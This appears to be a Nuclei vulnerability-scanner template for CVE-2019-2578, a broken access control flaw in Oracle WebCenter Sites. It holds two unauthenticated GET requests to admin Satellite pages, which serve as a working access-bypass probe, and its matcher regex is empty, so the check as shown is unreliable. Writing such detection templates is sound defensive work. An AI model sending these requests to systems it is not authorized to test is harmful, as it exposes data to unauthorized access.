id: CVE-2019-2578 info: name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control author: leovalcante severity: high description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data. reference: - https://www.oracle.com/security-alerts/cpuapr2019.html - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://nvd.nist.gov/vuln/detail/CVE-2019-2578 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2019-2578 tags: cve,cve2019,oracle,wcs,auth-bypass requests: - raw: - | GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1 Host: {{Hostname}} - | GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true matchers: - type: regex part: body regex: - '' # Enhanced by mp on 2022/05/04